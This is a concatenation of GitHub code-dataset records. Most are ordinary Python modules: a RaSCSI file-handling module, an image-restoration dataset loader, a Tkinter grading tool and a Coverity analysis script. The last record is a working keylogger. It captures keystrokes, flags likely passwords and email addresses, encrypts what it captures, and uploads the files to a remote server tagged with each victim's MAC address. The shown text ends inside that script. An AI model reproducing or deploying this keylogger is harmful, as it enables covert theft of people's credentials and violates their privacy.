\"\"\"\n Takes (str) file_path and (str) target_path\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n if os.path.exists(PurePath(target_path).parent):\n os.rename(file_path, target_path)\n return {\n \"status\": True,\n \"msg\": _(u\"File moved to: %(target_path)s\", target_path=target_path),\n }\n return {\n \"status\": False,\n \"msg\": _(u\"Unable to move file to: %(target_path)s\", target_path=target_path),\n }\n\n\ndef unzip_file(file_name, member=False, members=False):\n \"\"\"\n Takes (str) file_name, optional (str) member, optional (list) of (str) members\n file_name is the name of the zip file to unzip\n member is the full path to the particular file in the zip file to unzip\n members contains all of the full paths to each of the zip archive members\n Returns (dict) with (boolean) status and (list of str) msg\n \"\"\"\n from asyncio import run\n server_info = get_server_info()\n prop_flag = False\n\n if not member:\n unzip_proc = run(run_async(\n f\"unzip -d {server_info['image_dir']} -n -j \"\n f\"{server_info['image_dir']}/{file_name}\"\n ))\n if members:\n for path in members:\n if path.endswith(PROPERTIES_SUFFIX):\n name = PurePath(path).name\n rename_file(f\"{server_info['image_dir']}/{name}\", f\"{CFG_DIR}/{name}\")\n prop_flag = True\n else:\n from re import escape\n member = escape(member)\n unzip_proc = run(run_async(\n f\"unzip -d {server_info['image_dir']} -n -j \"\n f\"{server_info['image_dir']}/{file_name} {member}\"\n ))\n # Attempt to unzip a properties file in the same archive dir\n unzip_prop = run(run_async(\n f\"unzip -d {CFG_DIR} -n -j \"\n f\"{server_info['image_dir']}/{file_name} {member}.{PROPERTIES_SUFFIX}\"\n ))\n if unzip_prop[\"returncode\"] == 0:\n prop_flag = True\n if unzip_proc[\"returncode\"] != 0:\n logging.warning(\"Unzipping failed: %s\", unzip_proc[\"stderr\"])\n return {\"status\": False, \"msg\": unzip_proc[\"stderr\"]}\n\n from re import findall\n unzipped = findall(\n \"(?:inflating|extracting):(.+)\\n\",\n unzip_proc[\"stdout\"]\n )\n return {\"status\": True, \"msg\": unzipped, \"prop_flag\": prop_flag}\n\n\ndef download_file_to_iso(url, *iso_args):\n \"\"\"\n Takes (str) url and one or more (str) *iso_args\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from time import time\n from subprocess import run, CalledProcessError\n import asyncio\n\n server_info = get_server_info()\n\n file_name = PurePath(url).name\n tmp_ts = int(time())\n tmp_dir = \"/tmp/\" + str(tmp_ts) + \"/\"\n os.mkdir(tmp_dir)\n tmp_full_path = tmp_dir + file_name\n iso_filename = f\"{server_info['image_dir']}/{file_name}.iso\"\n\n req_proc = download_to_dir(url, tmp_dir)\n\n if not req_proc[\"status\"]:\n return {\"status\": False, \"msg\": req_proc[\"msg\"]}\n\n from zipfile import is_zipfile, ZipFile\n if is_zipfile(tmp_full_path):\n if \"XtraStuf.mac\" in str(ZipFile(tmp_full_path).namelist()):\n logging.info(\"MacZip file format detected. Will not unzip to retain resource fork.\")\n else:\n logging.info(\n \"%s is a zipfile! Will attempt to unzip and store the resulting files.\",\n tmp_full_path,\n )\n unzip_proc = asyncio.run(run_async(\n f\"unzip -d {tmp_dir} -n {tmp_full_path}\"\n ))\n if not unzip_proc[\"returncode\"]:\n logging.info(\n \"%s was successfully unzipped. Deleting the zipfile.\",\n tmp_full_path,\n )\n delete_file(tmp_full_path)\n\n try:\n run(\n [\n \"genisoimage\",\n *iso_args,\n \"-o\",\n iso_filename,\n tmp_dir,\n ],\n capture_output=True,\n check=True,\n )\n except CalledProcessError as error:\n logging.warning(\"Executed shell command: %s\", \" \".join(error.cmd))\n logging.warning(\"Got error: %s\", error.stderr.decode(\"utf-8\"))\n return {\"status\": False, \"msg\": error.stderr.decode(\"utf-8\")}\n\n return {\n \"status\": True,\n \"msg\": _(\n u\"Created CD-ROM ISO image with arguments \\\"%(value)s\\\"\",\n value=\" \".join(iso_args),\n ),\n \"file_name\": iso_filename,\n }\n\n\ndef download_to_dir(url, save_dir):\n \"\"\"\n Takes (str) url, (str) save_dir\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n import requests\n file_name = PurePath(url).name\n logging.info(\"Making a request to download %s\", url)\n\n try:\n with requests.get(url, stream=True, headers={\"User-Agent\": \"Mozilla/5.0\"}) as req:\n req.raise_for_status()\n with open(f\"{save_dir}/{file_name}\", \"wb\") as download:\n for chunk in req.iter_content(chunk_size=8192):\n download.write(chunk)\n except requests.exceptions.RequestException as error:\n logging.warning(\"Request failed: %s\", str(error))\n return {\"status\": False, \"msg\": str(error)}\n\n logging.info(\"Response encoding: %s\", req.encoding)\n logging.info(\"Response content-type: %s\", req.headers[\"content-type\"])\n logging.info(\"Response status code: %s\", req.status_code)\n\n return {\n \"status\": True,\n \"msg\": _(\n u\"%(file_name)s downloaded to %(save_dir)s\",\n file_name=file_name,\n save_dir=save_dir,\n ),\n }\n\n\ndef write_config(file_name):\n \"\"\"\n Takes (str) file_name\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from json import dump\n file_name = f\"{CFG_DIR}/{file_name}\"\n try:\n with open(file_name, \"w\") as json_file:\n version = get_server_info()[\"version\"]\n devices = list_devices()[\"device_list\"]\n for device in devices:\n # Remove keys that we don't want to store in the file\n del device[\"status\"]\n del device[\"file\"]\n # It's cleaner not to store an empty parameter for every device without media\n if device[\"image\"] == \"\":\n device[\"image\"] = None\n # RaSCSI product names will be generated on the fly by RaSCSI\n if device[\"vendor\"] == \"RaSCSI\":\n device[\"vendor\"] = device[\"product\"] = device[\"revision\"] = None\n # A block size of 0 is how RaSCSI indicates N/A for block size\n if device[\"block_size\"] == 0:\n device[\"block_size\"] = None\n # Convert to a data type that can be serialized\n device[\"params\"] = dict(device[\"params\"])\n reserved_ids_and_memos = []\n reserved_ids = get_reserved_ids()[\"ids\"]\n for scsi_id in reserved_ids:\n reserved_ids_and_memos.append({\"id\": scsi_id, \"memo\": RESERVATIONS[int(scsi_id)]})\n dump(\n {\"version\": version, \"devices\": devices, \"reserved_ids\": reserved_ids_and_memos},\n json_file,\n indent=4\n )\n return {\n \"status\": True,\n \"msg\": _(u\"Saved configuration file to %(file_name)s\", file_name=file_name),\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n delete_file(file_name)\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not write to file: %s\", file_name)\n delete_file(file_name)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not write to file: %(file_name)s\", file_name=file_name),\n }\n\n\ndef read_config(file_name):\n \"\"\"\n Takes (str) file_name\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from json import load\n file_name = f\"{CFG_DIR}/{file_name}\"\n try:\n with open(file_name) as json_file:\n config = load(json_file)\n # If the config file format changes again in the future,\n # introduce more sophisticated format detection logic here.\n if isinstance(config, dict):\n detach_all()\n ids_to_reserve = []\n for item in config[\"reserved_ids\"]:\n ids_to_reserve.append(item[\"id\"])\n RESERVATIONS[int(item[\"id\"])] = item[\"memo\"]\n reserve_scsi_ids(ids_to_reserve)\n for row in config[\"devices\"]:\n kwargs = {\n \"device_type\": row[\"device_type\"],\n \"image\": row[\"image\"],\n \"unit\": int(row[\"unit\"]),\n \"vendor\": row[\"vendor\"],\n \"product\": row[\"product\"],\n \"revision\": row[\"revision\"],\n \"block_size\": row[\"block_size\"],\n }\n params = dict(row[\"params\"])\n for param in params.keys():\n kwargs[param] = params[param]\n attach_image(row[\"id\"], **kwargs)\n # The config file format in RaSCSI 21.10 is using a list data type at the top level.\n # If future config file formats return to the list data type,\n # introduce more sophisticated format detection logic here.\n elif isinstance(config, list):\n detach_all()\n for row in config:\n kwargs = {\n \"device_type\": row[\"device_type\"],\n \"image\": row[\"image\"],\n # \"un\" for backwards compatibility\n \"unit\": int(row[\"un\"]),\n \"vendor\": row[\"vendor\"],\n \"product\": row[\"product\"],\n \"revision\": row[\"revision\"],\n \"block_size\": row[\"block_size\"],\n }\n params = dict(row[\"params\"])\n for param in params.keys():\n kwargs[param] = params[param]\n attach_image(row[\"id\"], **kwargs)\n else:\n return {\"status\": False, \"msg\": _(u\"Invalid configuration file format\")}\n return {\n \"status\": True,\n \"msg\": _(u\"Loaded configurations from: %(file_name)s\", file_name=file_name),\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not read file: %s\", file_name)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not read configuration file: %(file_name)s\", file_name=file_name),\n }\n\n\ndef write_drive_properties(file_name, conf):\n \"\"\"\n Writes a drive property configuration file to the config dir.\n Takes file name base (str) and (list of dicts) conf as arguments\n Returns (dict) with (bool) status and (str) msg\n \"\"\"\n from json import dump\n file_path = f\"{CFG_DIR}/{file_name}\"\n try:\n with open(file_path, \"w\") as json_file:\n dump(conf, json_file, indent=4)\n return {\n \"status\": True,\n \"msg\": _(u\"Created properties file: %(file_path)s\", file_path=file_path),\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n delete_file(file_path)\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not write to file: %s\", file_path)\n delete_file(file_path)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not write to properties file: %(file_path)s\", file_path=file_path),\n }\n\n\ndef read_drive_properties(file_path):\n \"\"\"\n Reads drive properties from json formatted file.\n Takes (str) file_path as argument.\n Returns (dict) with (bool) status, (str) msg, (dict) conf\n \"\"\"\n from json import load\n try:\n with open(file_path) as json_file:\n conf = load(json_file)\n return {\n \"status\": True,\n \"msg\": _(u\"Read properties from file: %(file_path)s\", file_path=file_path),\n \"conf\": conf,\n }\n except (IOError, ValueError, EOFError, TypeError) as error:\n logging.error(str(error))\n return {\"status\": False, \"msg\": str(error)}\n except:\n logging.error(\"Could not read file: %s\", file_path)\n return {\n \"status\": False,\n \"msg\": _(u\"Could not read properties from file: %(file_path)s\", file_path=file_path),\n }\n","repo_name":"akuker/RASCSI-micromod","sub_path":"src/web/file_cmds.py","file_name":"file_cmds.py","file_ext":"py","file_size_in_byte":19287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26398819038","text":"# This file contains the dataset classes used for training and testing.\n\nfrom pytorch_lightning import LightningDataModule\nfrom torch.utils.data import DataLoader, Dataset\nimport torch\nfrom torchvision import transforms, io\nimport torchvision.transforms.functional as TF\nfrom pathlib import Path\nimport numpy as np\nfrom utils import rescale_colors\n\n\ndef randomJPEGcompression(image):\n qf = np.random.randint(40, 100)\n res = io.decode_jpeg(io.encode_jpeg(image.type(torch.uint8), qf)).type_as(image)\n return res\n\n\ndef randomGaussianBlur(image):\n sigma = np.random.uniform(1.0, 5.0)\n k = np.random.choice([3, 5, 7])\n return torch.clamp(TF.gaussian_blur(image, (k, k), sigma), 0.0, 255.0)\n\n\ndef randomGaussianNoise(image):\n sigma = np.random.uniform(5.0, 50.0)\n return torch.clamp(image + torch.randn_like(image) * sigma, 0.0, 255.0)\n\n\ndef randomColorJitter(image):\n # A bit strange, but it is used in the paper\n delta = np.random.uniform(-20.0, 20.0)\n return torch.clamp(image + delta, 0.0, 255.0)\n\n\ndata_transform = transforms.Compose(\n [\n transforms.RandomCrop(256, pad_if_needed=True),\n transforms.RandomHorizontalFlip(0.5),\n ]\n)\n\nrandom_degradation = transforms.RandomOrder(\n [\n transforms.RandomApply([transforms.Lambda(randomGaussianNoise)], p=0.7),\n transforms.RandomApply([transforms.Lambda(randomGaussianBlur)], p=0.7),\n transforms.RandomApply([transforms.Lambda(randomJPEGcompression)], p=0.7),\n transforms.RandomApply([transforms.Lambda(randomColorJitter)], p=0.7),\n ]\n)\n\n\n# Dataset class that load 256x256 center cropped images from a directory (For VAE2 training and visualization)\nclass VanillaDataset(Dataset):\n def __init__(self, data_dir: str, split: str, split_ratio=0.75):\n # load images\n self.data_dir = Path(data_dir)\n imgs = sorted(\n [\n str(f)\n for f in self.data_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n\n self.imgs = (\n imgs[: int(len(imgs) * split_ratio)]\n if split == \"train\"\n else imgs[int(len(imgs) * split_ratio) :]\n )\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = io.read_image(self.imgs[idx]).float()\n img = data_transform(img)\n\n return rescale_colors(img), 0.0\n\n\n# Dataset class that load 256x256 center cropped images from a directory (For Mapping training) and add random degradation.\n# The dataset is composed of pairs of clean and noisy images.\nclass MappingDataset(Dataset):\n def __init__(self, data_dir: str, split: str, split_ratio=0.75):\n # Load images\n self.data_dir = Path(data_dir + \"/non_noisy\")\n imgs = sorted(\n [\n str(f)\n for f in self.data_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n\n self.imgs = (\n imgs[: int(len(imgs) * split_ratio)]\n if split == \"train\"\n else imgs[int(len(imgs) * split_ratio) :]\n )\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = io.read_image(self.imgs[idx]).float()\n img = data_transform(img)\n noisy_img = random_degradation(img)\n\n return torch.stack([rescale_colors(img), rescale_colors(noisy_img)]), 0.0\n\n\n# Dataset class that load 256x256 center cropped images from a noisy image directory and a clean image directory (For VAE1 training).\n# The clean images are degraded with noise.\n# The dataset is composed of pairs of noisy images and a label indicating if the noise of the image is synthetic or real.\nclass PhaseADataset(Dataset):\n def __init__(self, data_dir: str, split: str, split_ratio=0.75):\n\n # Load noisy images\n real_data_dir = Path(data_dir + \"/noisy\")\n real_imgs = sorted(\n [\n str(f)\n for f in real_data_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n\n real_imgs = (\n real_imgs[: int(len(real_imgs) * split_ratio)]\n if split == \"train\"\n else real_imgs[int(len(real_imgs) * split_ratio) :]\n )\n\n # Load clean images to which we will add synthetic noise\n data_for_synthesis_dir = Path(data_dir + \"/non_noisy\")\n imgs_for_synthesis = sorted(\n [\n str(f)\n for f in data_for_synthesis_dir.iterdir()\n if f.suffix == \".png\" or f.suffix == \".jpg\"\n ]\n )\n imgs_for_synthesis = (\n imgs_for_synthesis[: int(len(imgs_for_synthesis) * split_ratio)]\n if split == \"train\"\n else imgs_for_synthesis[int(len(imgs_for_synthesis) * split_ratio) :]\n )\n\n # Combine the two sets of images\n self.imgs = [(path, 1.0) for path in real_imgs] + [\n (path, 0.0) for path in imgs_for_synthesis\n ]\n np.random.shuffle(self.imgs)\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n img = io.read_image(self.imgs[idx][0]).float()\n if self.imgs[idx][1] == 0.0: # if image is clean then we add synthetic noise\n img = random_degradation(img)\n img = data_transform(img)\n\n return rescale_colors(img), self.imgs[idx][1]\n\n\n# DataModule for the 3 phases : A, B, Mapping\nclass GenericDataModule(LightningDataModule):\n def __init__(\n self,\n data_dir: str,\n batch_size: int = 16,\n num_workers: int = 4,\n phase: str = \"A\",\n split_ratio=0.75,\n ):\n super().__init__()\n\n self.data_dir = data_dir\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.phase = phase\n self.split_ratio = split_ratio\n\n def setup(self, stage=None) -> None:\n if self.phase == \"A\":\n self.val_dataset = PhaseADataset(\n self.data_dir, split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = PhaseADataset(\n self.data_dir, split=\"train\", split_ratio=self.split_ratio\n )\n elif self.phase == \"B\":\n self.val_dataset = VanillaDataset(\n self.data_dir + \"/non_noisy\", split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = VanillaDataset(\n self.data_dir + \"/non_noisy\",\n split=\"train\",\n split_ratio=self.split_ratio,\n )\n elif self.phase == \"Mapping\":\n self.val_dataset = MappingDataset(\n self.data_dir, split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = MappingDataset(\n self.data_dir, split=\"train\", split_ratio=self.split_ratio\n )\n elif self.phase == \"Vanilla\":\n self.val_dataset = VanillaDataset(\n self.data_dir, split=\"val\", split_ratio=self.split_ratio\n )\n self.train_dataset = VanillaDataset(\n self.data_dir, split=\"train\", split_ratio=self.split_ratio\n )\n else:\n raise Exception(\"Invalid phase\")\n print(\"Dataset size : \", len(self.train_dataset))\n\n def train_dataloader(self):\n return DataLoader(\n self.train_dataset,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n shuffle=True,\n )\n\n def val_dataloader(self):\n return DataLoader(\n self.val_dataset,\n batch_size=self.batch_size,\n num_workers=self.num_workers,\n shuffle=False,\n )\n\n def test_dataloader(self):\n return DataLoader(\n self.val_dataset,\n batch_size=16,\n num_workers=self.num_workers,\n shuffle=True,\n )\n","repo_name":"Thomick/Image-Restoration","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4871580094","text":"# Standard Library\nimport glob\nimport os\nfrom tkinter import END, Button, Checkbutton, Entry, IntVar, Label, StringVar, Tk\nfrom tkinter.filedialog import askopenfilename\n\nfrom file_management.compile import compile_c\nfrom file_management.feedback import (\n create_feedback_file,\n format_names,\n get_missing_names,\n open_feedback_file,\n)\nfrom file_management.zip_archives import setup_safe_mode, unzip, unzip_outer\n\n\nclass App(object):\n def __init__(self):\n self.version = \"0.1.1\"\n self.root = Tk()\n\n # set default dimensions, color and title\n self.grey = \"#909296\"\n self.yellow = \"#f7f574\"\n self.green = \"#93b185\"\n\n self.root.geometry(\"600x450\")\n self.root.wm_title(f\"CompCorrector v{self.version}\")\n\n self.label = Label(self.root, text=\"path to zipfile\")\n self.label.pack(pady=5)\n\n # text entry for zip path\n self.zip_dir = StringVar()\n self.entry_zip_dir = Entry(self.root, textvariable=self.zip_dir, width=\"400\", bg=self.grey)\n self.entry_zip_dir.pack(pady=5)\n\n # open zip button\n self.buttontext = StringVar()\n self.buttontext.set(\"CHOOSE ZIP\")\n Button(\n self.root,\n textvariable=self.buttontext,\n command=self.select_zip_file,\n bg=self.yellow,\n ).pack(pady=5)\n\n self.label = Label(self.root, text=\"list of names\")\n self.label.pack(pady=5)\n\n # text entry for names\n self.names = StringVar()\n self.entry_names = Entry(self.root, textvariable=self.names, width=\"400\", bg=self.grey)\n self.entry_names.pack(pady=5)\n\n # check-boxes\n self.rm_zips = IntVar()\n self.rm_zips.set(False)\n self.check_rm_zips = Checkbutton(\n self.root,\n variable=self.rm_zips,\n onvalue=True,\n offvalue=False,\n text=\"remove zips\",\n )\n\n self.compile = IntVar()\n self.compile.set(False)\n self.check_compile = Checkbutton(\n self.root,\n variable=self.compile,\n onvalue=True,\n offvalue=False,\n text=\"compile files\",\n )\n\n self.safe_mode = IntVar()\n self.safe_mode.set(False)\n self.check_safe_mode = Checkbutton(\n self.root,\n variable=self.safe_mode,\n onvalue=True,\n offvalue=False,\n text=\"safe mode\",\n )\n\n self.feedback = IntVar()\n self.feedback.set(False)\n self.check_feedback = Checkbutton(\n self.root,\n variable=self.feedback,\n onvalue=True,\n offvalue=False,\n text=\"feedback.docx\",\n )\n\n # have checkbox checked by default\n self.check_rm_zips.select()\n self.check_compile.select()\n self.check_safe_mode.select()\n self.check_feedback.select()\n\n # place checkboxes on gui\n self.check_safe_mode.pack()\n self.check_rm_zips.pack()\n self.check_compile.pack()\n self.check_feedback.pack()\n\n # set open dir button\n self.buttontext2 = StringVar()\n self.buttontext2.set(\"START\")\n Button(\n self.root,\n textvariable=self.buttontext2,\n command=self.run_main,\n bg=self.green,\n ).pack(pady=5)\n\n # label for errors\n self.error_label = Label(self.root, text=\"\", foreground=\"red\", bg=self.grey)\n self.error_label.pack(pady=5)\n\n # label for warnings\n self.warning_label = Label(self.root, text=\"\", foreground=self.yellow, bg=self.grey)\n self.warning_label.pack(pady=5)\n\n # label for completion\n self.completion_label = Label(self.root, text=\"\", bg=self.grey)\n self.completion_label.pack(pady=5)\n\n self.root.mainloop()\n\n def append_warning(self, warning_text):\n self.warning_label.configure(text=f\"{self.warning_label.cget('text')} {warning_text}\\n\")\n\n def append_error(self, error_text):\n self.error_label.configure(text=f\"{self.error_label.cget('text')} {error_text}\\n\")\n\n def flush_labels(self):\n self.warning_label.configure(text=\"\")\n self.error_label.configure(text=\"\")\n self.completion_label.configure(text=\"\")\n\n def select_zip_file(self):\n self.flush_labels()\n filename = askopenfilename()\n if filename.endswith(\".zip\"):\n # flush old text and insert new selected file\n self.entry_zip_dir.delete(0, END)\n self.entry_zip_dir.insert(0, filename)\n else:\n self.append_error(f\"You must select a .zip file to begin. Got {filename}\")\n\n file_dir = os.path.dirname(filename)\n if not self.safe_mode.get() and len(glob.glob(f\"{file_dir}/*\")) > 1:\n self.append_warning(\n f\"Be careful, there are multiple items in the current directory: {file_dir}\"\n )\n\n def run_compile(self, cwd):\n try:\n compiled = compile_c(cwd)\n if compiled > 0:\n self.append_error(f\"Error compiling {compiled} file(s)\")\n except:\n self.append_error(f\"Exception compiling file(s)\")\n raise\n\n def run_feedbac(self, cwd, names, missing_names):\n try:\n feedback_file = create_feedback_file(cwd, names, missing_names)\n open_feedback_file(feedback_file)\n except:\n self.append_error(\"Exception creating feedback.docx\")\n raise\n\n def main(self):\n self.flush_labels()\n\n try:\n names = format_names(self.entry_names.get())\n except:\n self.append_error(\"Exception parsing names\")\n print(\"Exception parsing names\")\n return False\n\n zip_path = self.entry_zip_dir.get()\n if not zip_path.endswith(\".zip\"):\n self.append_error(f\"You must select a .zip file to begin. Got {zip_path}\")\n return False\n\n # at this point names are list of strings and directory is correct\n cwd = os.path.dirname(zip_path)\n\n if self.entry_names.get().strip() == \"\":\n self.append_warning(\n f\"No names included. All files will be extracted and feedback.docx will be empty\"\n )\n\n # TODO: remove concept of safemode. Always run this way, don't allow unsafe mode.\n if self.safe_mode.get():\n cwd, zip_path = setup_safe_mode(cwd, zip_path)\n\n # if safe mode is enabled, move zip to safe folder, then run.\n # otherwise run in directory zip already is.\n unzip_outer(zip_path, names)\n\n # get directory of zipfile, unzip and move files in subdirectories\n extraction_errors = unzip(cwd, rm_zips=self.rm_zips.get())\n if extraction_errors:\n self.append_error(f\"Exception extracting: {extraction_errors}\")\n\n missing_names = get_missing_names(cwd, names)\n if missing_names:\n self.append_warning(f\"The following students seem to be missing files: {missing_names}\")\n\n if self.compile.get():\n self.run_compile(cwd)\n\n if self.feedback.get():\n self.run_feedbac(cwd, names, missing_names)\n\n self.completion_label.configure(text=\"Finished!\")\n print(\"Finished!\")\n\n def run_main(self):\n try:\n self.main()\n except:\n # catch exception to allow prompt within ui, then re-raise exception\n self.error_label.configure(\n text=f\"{self.error_label.cget('text')} Unhandled Exception. Check the console\\n\"\n )\n raise\n\n\nif __name__ == \"__main__\":\n App()\n","repo_name":"ConorSheehan1/comp_corrector","sub_path":"src/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":7684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30865437524","text":"# import statement\nimport pymysql\nimport sys\nimport numpy as np\nimport datetime\nimport re\nimport subprocess\nimport shlex\nimport os\nfrom openpyxl import Workbook\nimport dateutil.parser as dp\n\n# open sql connection\nconnection = pymysql.connect(host='localhost',\n user='root',\n db='soverityscan_sandbox',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor,\n autocommit=True)\n\ndef execute(query):\n with connection.cursor() as cursor:\n cursor.execute(query)\n results = cursor.fetchall()\n return results\n\nf=open('temp.txt','w')\nprojects=['Linux','Firefox','Samba','Kodi','Ovirt-engine']\n\nfor project in projects:\n query=\"select count(*) as c from alerts where is_invalid=0 and stream='\"+project+\"';\"\n total_alerts=execute(query)[0]['c']\n # need to subtract new alerts that are alive for less the median lifespan of actionable alerts\n \n query='''select count(*) as c from actionability ac\n join alerts a \n on a.idalerts=ac.alert_id\n where ac.actionability = 1\n and a.is_invalid=0\n and a.stream=\"''' + project + '\"'\n actionable_count=execute(query)[0]['c']\n \n query='''select datediff(s.date,a.first_detected) as diff from actionability ac\n join alerts a \n on a.idalerts=ac.alert_id\n join snapshots s\n on a.last_snapshot_id=s.idsnapshots\n where ac.actionability = 1\n and a.is_invalid=0\n and a.stream=\"''' + project + '\"'\n results=execute(query)\n temp=[]\n for item in results:\n temp.append(item['diff'])\n \n actionable_lifespan=np.median(temp)\n\n query='''select count(*) as c\n from alerts \n where stream=\"'''+project+'''\"\n and status='New'\n and is_invalid=0\n and datediff(\n (select date\n from snapshots\n where stream=\"'''+project+'''\"\n order by idsnapshots desc\n limit 1),\n first_detected\n ) <=''' +str(actionable_lifespan)\n too_new_to_count=execute(query)[0]['c']\n adjusted_total=total_alerts - too_new_to_count\n actionability_rate=round(((float(actionable_count)/adjusted_total)*100),1)\n\n query=\"select count(*) as c from alerts where is_invalid=0 and status='Fixed' and stream='\"+project+\"';\"\n eliminated=execute(query)[0]['c']\n elim_rate=round(((float(eliminated)/total_alerts)*100),1)\n\n query=\"select count(*) as c from alerts where is_invalid=0 and classification='Bug' and stream='\"+project+\"';\"\n bug=execute(query)[0]['c']\n bug_rate=round(((float(bug)/total_alerts)*100),1)\n\n elim=str(eliminated)+' ('+str(elim_rate)+'\\%)'\n act=str(actionable_count)+' ('+str(actionability_rate)+'\\%)'\n traiged_bug=str(bug)+' ('+str(bug_rate)+'\\%)'\n\n temp=[project,total_alerts,elim,act,traiged_bug]\n\n f.write('&'.join(str(x) for x in temp)+r'\\\\'+'\\n')\n","repo_name":"nasifimtiazohi/Coverity-Data-Analysis","sub_path":"issre_analysis/actionability_analysis.py","file_name":"actionability_analysis.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34415605462","text":"import keyboard\nimport os\nimport re\nfrom typing import IO\nimport requests\nimport uuid\nimport time\nimport encryption_decryption\n\n\nclass Word:\n def __init__(self) -> None:\n self.letters = \"\" # Contains the actual letters of the word\n self.status = False # Status of the word being typed, whether the user has finished typing it out or not\n self.priority = 2 # Priority of the word, check @word_priority_predictor\n\n# Create a filename based off the current timestamp and the infected device's MAC address\n# The name is in the format timestamp MAC address\n# This allows the attacker to identify each infected and each uploaded file per infected\n\ndef generate_file_name()-> str:\n time_stamp = time.strftime('%Y-%m-%d %H.%M.%S', time.localtime())\n return str(time_stamp+\" \"+str(uuid.getnode()))\n\n# Creates the logged_words_file and returns an IO object for writing to the file\ndef create_logged_words_file(path:str, file_name:str)->IO:\n file_path = os.path.join(os.path.abspath(path), file_name)\n return open(file_path, \"ab\")\n\n# Determines the priority of a word bassed off of how likely it is to be a password\ndef word_priority_predictor(word: Word)->int:\n # Matches any string that is 8 characters or more, as most passwords usually are\n length_regex = re.compile(r'^.{8,}$')\n # Matches any string that includes a mix of uppercase and lowercase letters, numbers, and special characters, which is usually a password requirement\n special_char_regex = re.compile(r'^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#?!@$%^&*-])\\S+$')\n\n if length_regex.match(word.letters):\n if special_char_regex.match(word.letters) or len(word.letters.split(\"password:\"))>1:\n word.priority = 0\n else:\n word.priority = 1\n\n# Keeps track of the word being typed until enter or space or tab is logged\ndef read_word_being_typed(event: keyboard.KeyboardEvent, word: Word):\n # If enter, space or tab is logged then return true cause we assume the infected has finished typing the word\n if (event.name == \"enter\" or event.name == \"space\" or event.name == \"tab\"):\n if email_check(word.letters):\n word.letters = f\"email: {word.letters} password: \"\n return\n\n word_priority_predictor(word)\n if word.priority < 2:\n word.status = True\n else:\n word.letters = \"\"\n elif event.name == \"backspace\":\n word.letters = word.letters[:-1] if word.letters else \"\" # To avoid an IndexError for cases where the string is empty\n else:\n # Update the word string if only one character was entered, to avoid saving keyboard events like ctrl, shift etc\n if len(event.name)==1:\n word.letters+=event.name\n\n# Check whether the typed word is potentially an email\ndef email_check(word: str):\n email_regex = re.compile('^[\\w+\\-.]+@[a-z\\d\\-]+(\\.[a-z\\d\\-]+)*\\.[a-z]+$')\n return email_regex.match(word)\n\n# Encrypt the logged word then write it to the logged_words_file\ndef update_logged_words_file(words: list[Word], public_key: encryption_decryption.rsa.RSAPublicKey, file: IO):\n #Final string containing all the logged words\n final_string = \"\"\n for word in words:\n final_string+=f\"{word.letters} {word.priority}\\n\"\n # Convert the string into bytes for encryption\n encoded = final_string.encode() \n encrypted = encryption_decryption.encrypt(encoded, public_key)\n file.write(encrypted)\n print(\"Logged\")\n\n# Upload the file to whatever site the attacker wants then delete it in the infected device\ndef upload(file_path:str, file_name:str, url:str, token:str)->bool:\n with open(file_path, \"rb\") as f:\n file = {\"file\": (file_name, f)}\n response = requests.post(url=url+token, files=file)\n os.unlink(file_path)\n return response.json()[\"status\"]\n\nroot_script_path = \"./\"\npublic_key_path = root_script_path+\"public_key.pem\"\nlogged_files_folder = root_script_path+\"/logged_files\"\nupload_rate = 2 # Rate at which logged words should be uploaded, e.g upload_rate = 2 would mean upload after every two words \n\n# Script loop\ndef main():\n if not os.path.exists(logged_files_folder): os.mkdir(logged_files_folder)\n logged_words_file = create_logged_words_file(logged_files_folder, generate_file_name())\n public_key = encryption_decryption.load_public_key(public_key_path)\n words = []\n while True:\n word = Word()\n words.append(word)\n # lambda function in order the pass the word object to read_word_being_typed, kinda hacky\n hooked_function = lambda event: read_word_being_typed(event, word)\n hook = keyboard.on_press(hooked_function)\n while not word.status: pass\n keyboard.unhook(hook)\n if len(words) == upload_rate:\n update_logged_words_file(words, public_key, logged_words_file)\n logged_words_file = create_logged_words_file(logged_files_folder, generate_file_name()) \n words = []\n\nif __name__ == \"__main__\":\n 